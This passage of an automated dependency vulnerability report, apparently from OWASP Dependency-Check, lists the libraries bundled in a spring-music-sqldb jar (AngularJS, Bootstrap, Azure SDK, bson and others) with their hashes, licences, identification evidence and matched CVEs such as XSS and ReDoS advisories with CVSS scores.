cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9
CVE-2022-25869
All versions of package angular are vulnerable to Cross-site Scripting (XSS) due to insecure page caching in the Internet Explorer browser, which allows interpolation of <textarea> elements.
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:*
CVE-2020-7676
angular.js prior to 1.8.0 allows cross site scripting. The regex-based input HTML replacement may turn sanitized code into unsanitized one. Wrapping "<option>" elements in "<select>" ones changes parsing behavior, leading to possibly unsanitizing code. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (5.4) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:2.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (excluding) 1.8.0
CVE-2023-26116
Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-2vrf-hf26-jrp5 report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.2.21; versions up to (including) 1.8.3
CVE-2023-26117
Versions of the package angular from 1.0.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the $resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-2qqx-w9hr-q5gx report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.0.0; versions up to (including) 1.8.3
CVE-2023-26118
Versions of the package angular from 1.4.9 are vulnerable to Regular Expression Denial of Service (ReDoS) via the <input type="url"> element due to the usage of an insecure regular expression in the input[url] functionality. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking. CWE-1333 Inefficient Regular Expression Complexity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:3.9/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-qwqh-hm9m-p5hr report@snyk.io - EXPLOIT report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular:*:*:*:*:*:node.js:*:* versions from (including) 1.4.9; versions up to (including) 1.8.3
CVE-2024-8373
Improper sanitization of the value of the [srcset] attribute in <source> HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing (https://owasp.org/www-community/attacks/Content_Spoofing).
This issue affects all versions of AngularJS.
Note:
The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see https://docs.angularjs.org/misc/version-support-status. CWE-791 Incomplete Filtering of Special Elements, NVD-CWE-Other
CVSSv3:
Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:angularjs:angular.js:*:*:*:*:*:*:*:* versions up to (including) 1.8.3 cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*
Cross-Site Scripting via JSONP (RETIREJS)
Cross-Site Scripting via JSONP Unscored:
References:
DOS in $sanitize (RETIREJS)
DOS in $sanitize Unscored:
References:
The attribute usemap can be used as a security exploit (RETIREJS)
The attribute usemap can be used as a security exploit Unscored:
References:
Universal CSP bypass via add-on in Firefox (RETIREJS)
Universal CSP bypass via add-on in Firefox Unscored:
References:
XSS via JQLite DOM manipulation functions in AngularJS (RETIREJS)
XSS via JQLite DOM manipulation functions in AngularJS Unscored:
References:
CVE-2025-0716 (RETIREJS)
Unscored:
References:
End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 (RETIREJS)
End-of-Life: Long term support for AngularJS has been discontinued as of December 31, 2021 Unscored:
References:
XSS in $sanitize in Safari/Firefox (RETIREJS)
XSS in $sanitize in Safari/Firefox Unscored:
References:
jquery issue: 162 (RETIREJS)
jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates Unscored:
References:
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: webjars-requirejs.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/webjars-requirejs.js
MD5: 454afbee5c9ea18772836e091ccbf3f0
SHA1: 3f773171678959bdc3b4654f05ac0eac55721200
SHA256: 3e7356c741a39a4d7d402010dd09b636b4b29b8446641885b666429eeaa79a21
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: antlr-2.7.7.jar
Description:
A framework for constructing recognizers, compilers,
and translators from grammatical descriptions containing
Java, C#, C++, or Python actions.
License:
BSD License: http://www.antlr.org/license.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/antlr-2.7.7.jar
MD5: f8f1352c52a4c6a500b597596501fc64
SHA1: 83cd2cd674a217ade95a4bb83a8a14f351f48bd0
SHA256: 88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c
Evidence Type Source Name Value Confidence Vendor central artifactid antlr Highest Vendor central groupid antlr Highest Vendor file name antlr High Vendor jar package name antlr Low Vendor pom artifactid antlr Low Vendor pom groupid antlr Highest Vendor pom name AntLR Parser Generator High Vendor pom url http://www.antlr.org/ Highest Product central artifactid antlr Highest Product file name antlr High Product pom artifactid antlr Highest Product pom groupid antlr Highest Product pom name AntLR Parser Generator High Product pom url http://www.antlr.org/ Medium Version central version 2.7.7 Highest Version file version 2.7.7 High Version pom version 2.7.7 Highest
spring-music-sqldb-1.0.jar: aspectjweaver-1.8.13.jar
Description:
The AspectJ weaver introduces advices to java classes
License:
Eclipse Public License - v 1.0: http://www.eclipse.org/legal/epl-v10.html
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/aspectjweaver-1.8.13.jar
MD5: 4a95811a5b41a038a359c05189de9829
SHA1: ad94df2a28d658a40dc27bbaff6a1ce5fbf04e9b
SHA256: 965d0928b0e07dcedb67f0d0a48653d36a6cff257e3270cb28ea48fef6c30a27
Evidence Type Source Name Value Confidence Vendor central artifactid aspectjweaver Highest Vendor central groupid org.aspectj Highest Vendor file name aspectjweaver High Vendor jar package name aspectj Highest Vendor jar package name aspectj Low Vendor jar package name org Highest Vendor jar package name weaver Highest Vendor jar package name weaver Low Vendor Manifest can-redefine-classes true Low Vendor Manifest Implementation-Vendor aspectj.org High Vendor Manifest name org/aspectj/weaver/ Medium Vendor Manifest specification-vendor aspectj.org Low Vendor pom artifactid aspectjweaver Low Vendor pom developer email aclement@vmware.com Low Vendor pom developer id aclement Medium Vendor pom developer name Andy Clement Medium Vendor pom groupid org.aspectj Highest Vendor pom name AspectJ weaver High Vendor pom url http://www.aspectj.org Highest Product central artifactid aspectjweaver Highest Product file name aspectjweaver High Product jar package name aspectj Highest Product jar package name org Highest Product jar package name weaver Highest Product jar package name weaver Low Product Manifest can-redefine-classes true Low Product Manifest Implementation-Title org.aspectj.weaver High Product Manifest name org/aspectj/weaver/ Medium Product Manifest specification-title AspectJ Weaver Classes Medium Product pom artifactid aspectjweaver Highest Product pom developer email aclement@vmware.com Low Product pom developer id aclement Low Product pom developer name Andy Clement Low Product pom groupid org.aspectj Highest Product pom name AspectJ weaver High Product pom url http://www.aspectj.org Medium Version central version 1.8.13 Highest Version file version 1.8.13 High Version Manifest Implementation-Version 1.8.13 High Version pom version 1.8.13 Highest
spring-music-sqldb-1.0.jar: azure-client-runtime-1.0.0.jar
Description:
This package contains the basic runtime for AutoRest generated Azure Java clients.
License:
The MIT License (MIT): http://opensource.org/licenses/MIT
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/azure-client-runtime-1.0.0.jar
MD5: a30dcca70f7e92ca2fcf9934777ea8ae
SHA1: 265022f1a05a0297f9b799cd2605593d2f635e5a
SHA256: d73ce3f88efb466cd71a6aa38c10889e704f7093ab0b34982d215bf29ac11ead
Evidence Type Source Name Value Confidence Vendor file name azure-client-runtime High Vendor jar package name azure Highest Vendor jar package name azure Low Vendor jar package name microsoft Highest Vendor jar package name microsoft Low Vendor pom artifactid azure-client-runtime Low Vendor pom developer id microsoft Medium Vendor pom developer name Microsoft Medium Vendor pom groupid com.microsoft.azure Highest Vendor pom name Azure Java Client Runtime for AutoRest High Vendor pom parent-artifactid autorest-clientruntime-for-java Low Vendor pom url Azure/autorest-clientruntime-for-java Highest Product file name azure-client-runtime High Product jar package name azure Highest Product jar package name azure Low Product jar package name microsoft Highest Product pom artifactid azure-client-runtime Highest Product pom developer id microsoft Low Product pom developer name Microsoft Low Product pom groupid com.microsoft.azure Highest Product pom name Azure Java Client Runtime for AutoRest High Product pom parent-artifactid autorest-clientruntime-for-java Medium Product pom url Azure/autorest-clientruntime-for-java High Version file version 1.0.0 High Version pom version 1.0.0 Highest
spring-music-sqldb-1.0.jar: azure-keyvault-1.0.0.jar
Description:
This package contains Microsoft Azure Key Vault SDK.
License:
The MIT License (MIT): http://opensource.org/licenses/MIT
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/azure-keyvault-1.0.0.jar
MD5: 9a8d568b3ed2108f4b16ed017532e39d
SHA1: 4dda51b3e10d5f5c1c19f7bf5f954af6e69a5177
SHA256: 68be4cfcf5d67d1ef12fa21cec5a2b823bdb8a761e72e46a63cf79e2b7f0b246
Evidence Type Source Name Value Confidence Vendor file name azure-keyvault High Vendor jar package name azure Highest Vendor jar package name keyvault Highest Vendor jar package name microsoft Highest Vendor Manifest Implementation-Vendor-Id com.microsoft.azure Medium Vendor pom artifactid azure-keyvault Low Vendor pom developer id microsoft Medium Vendor pom developer name Microsoft Medium Vendor pom groupid com.microsoft.azure Highest Vendor pom name Microsoft Azure SDK for Key Vault High Vendor pom parent-artifactid azure-keyvault-parent Low Vendor pom url Azure/azure-sdk-for-java Highest Product file name azure-keyvault High Product jar package name azure Highest Product jar package name keyvault Highest Product jar package name microsoft Highest Product Manifest Implementation-Title Microsoft Azure SDK for Key Vault High Product Manifest specification-title Microsoft Azure SDK for Key Vault Medium Product pom artifactid azure-keyvault Highest Product pom developer id microsoft Low Product pom developer name Microsoft Low Product pom groupid com.microsoft.azure Highest Product pom name Microsoft Azure SDK for Key Vault High Product pom parent-artifactid azure-keyvault-parent Medium Product pom url Azure/azure-sdk-for-java High Version file version 1.0.0 High Version Manifest Implementation-Version 1.0.0 High Version pom version 1.0.0 Highest
Related Dependencies
spring-music-sqldb-1.0.jar: azure-keyvault-webkey-1.0.0.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/azure-keyvault-webkey-1.0.0.jar
MD5: 1e86c440c92c4bc6e7ebe485d969fe8c
SHA1: b50bb89de94ab5f4bfb11b7317625a7c7fe70634
SHA256: a1de57f1921e9215c8e528e842c59fc5aacda844f816581b7b56aaaa89d5a0e0
pkg:maven/com.microsoft.azure/azure-keyvault-webkey@1.0.0
spring-music-sqldb-1.0.jar: bootstrap-3.1.1.jar
Description:
WebJar for Bootstrap
License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/bootstrap-3.1.1.jar
MD5: 636baf40fe72fa6b36c2cf173f04a81a
SHA1: a11ab29de60b76fa111a2ca583de57abdbbcad26
SHA256: 5e42d07a9896e06b4b0cbad6c0c30051bb2b213edbd9c02c78dc096612c41e99
Evidence Type Source Name Value Confidence Vendor file name bootstrap High Vendor pom artifactid bootstrap Low Vendor pom developer email james@jamesward.org Low Vendor pom developer id jamesward Medium Vendor pom developer name James Ward Medium Vendor pom groupid org.webjars Highest Vendor pom name Bootstrap High Vendor pom url http://webjars.org Highest Product file name bootstrap High Product pom artifactid bootstrap Highest Product pom developer email james@jamesward.org Low Product pom developer id jamesward Low Product pom developer name James Ward Low Product pom groupid org.webjars Highest Product pom name Bootstrap High Product pom url http://webjars.org Medium Version file version 3.1.1 High Version pom version 3.1.1 Highest
CVE-2016-10735
In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2, XSS is possible in the data-target attribute, a different vulnerability than CVE-2018-14041. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY info - https://github.com/advisories/GHSA-4p24-vmcr-4gqj Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions from (including) 3.0.0; versions up to (excluding) 3.4.0 cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta:*:*:*:*:*:*
CVE-2018-14041
In Bootstrap before 4.1.2, XSS is possible in the data-target property of scrollspy. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - VENDOR_ADVISORY info - https://github.com/advisories/GHSA-pj7m-g53m-7638 info - https://github.com/twbs/bootstrap/issues/20184 Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions from (including) 4.0.0; versions up to (excluding) 4.1.2 cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha3:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha4:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha5:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha6:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta3:*:*:*:*:*:*
CVE-2018-14042
In Bootstrap before 4.1.2, XSS is possible in the data-container property of tooltip. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - VENDOR_ADVISORY info - https://github.com/twbs/bootstrap/issues/20184 Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0 cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions from (including) 4.0.0; versions up to (excluding) 4.1.2 cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha3:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha4:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha5:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:alpha6:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta2:*:*:*:*:*:* cpe:2.3:a:getbootstrap:bootstrap:4.0.0:beta3:*:*:*:*:*:*
CVE-2018-20676
In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0
CVE-2018-20677
In Bootstrap before 3.4.0, XSS is possible in the affix configuration target property. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,VENDOR_ADVISORY info - https://github.com/advisories/GHSA-ph58-4vrj-w6hr Vulnerable Software & Versions (NVD):
cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:* versions up to (excluding) 3.4.0
CVE-2018-14040 (OSSINDEX)
In Bootstrap before 4.1.2, XSS is possible in the collapse data-parent attribute. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.099999904632568) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:*
CVE-2019-8331 (OSSINDEX)
In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2019-8331 for details CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.099999904632568) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:*
CVE-2024-6484 (OSSINDEX)
A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an <a> tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-6484 for details CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.099999904632568) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:*
CVE-2024-6485 (OSSINDEX)
A security vulnerability has been discovered in bootstrap that could enable Cross-Site Scripting (XSS) attacks. The vulnerability is associated with the data-loading-text attribute within the button plugin. This vulnerability can be exploited by injecting malicious JavaScript code into the attribute, which would then be executed when the button's loading state is triggered. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv2:
Base Score: LOW (2.0999999046325684) Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:bootstrap:3.1.1:*:*:*:*:*:*:*
Bootstrap before 4.0.0 is end-of-life and no longer maintained. (RETIREJS)
Bootstrap before 4.0.0 is end-of-life and no longer maintained. Unscored:
References:
spring-music-sqldb-1.0.jar: bootstrap-3.1.1.jar: webjars-requirejs.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/bootstrap-3.1.1.jar/META-INF/resources/webjars/bootstrap/3.1.1/webjars-requirejs.js
MD5: 789ccf1bc1a08036d1753c43bc6ac838
SHA1: c68ffdc2c076c8630fca6184eef122826249f40b
SHA256: 108ecc9810d96376defeeb6b5d1788e36c5ee278287d8c3dfa0f0900e83c8523
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: bson-3.6.3.jar
Description:
The BSON library
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/bson-3.6.3.jar
MD5: 77bdd3e2c3d577c0ed383dbf479f8af7
SHA1: 6c85ddf1fc96eb8776213bef6665d005a564ecd3
SHA256: 51c988ca3f913acd0d36a72283cc158902f85ee9ffd14c5005311871f6f9a1ed
Evidence Type Source Name Value Confidence Vendor central artifactid bson Highest Vendor central groupid org.mongodb Highest Vendor file name bson High Vendor jar package name bson Highest Vendor jar package name bson Low Vendor Manifest bundle-symbolicname org.mongodb.bson Medium Vendor pom artifactid bson Low Vendor pom developer name Various Medium Vendor pom developer org MongoDB Medium Vendor pom groupid org.mongodb Highest Vendor pom name BSON High Vendor pom url http://bsonspec.org Highest Product central artifactid bson Highest Product file name bson High Product jar package name bson Highest Product Manifest Bundle-Name bson Medium Product Manifest bundle-symbolicname org.mongodb.bson Medium Product pom artifactid bson Highest Product pom developer name Various Low Product pom developer org MongoDB Low Product pom groupid org.mongodb Highest Product pom name BSON High Product pom url http://bsonspec.org Medium Version central version 3.6.3 Highest Version file version 3.6.3 High Version Manifest build-version 3.6.3 Medium Version Manifest Bundle-Version 3.6.3 High Version pom version 3.6.3 Highest
spring-music-sqldb-1.0.jar: classmate-1.3.4.jar
Description:
Library for introspecting types with full generic information
including resolving of field and method types.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
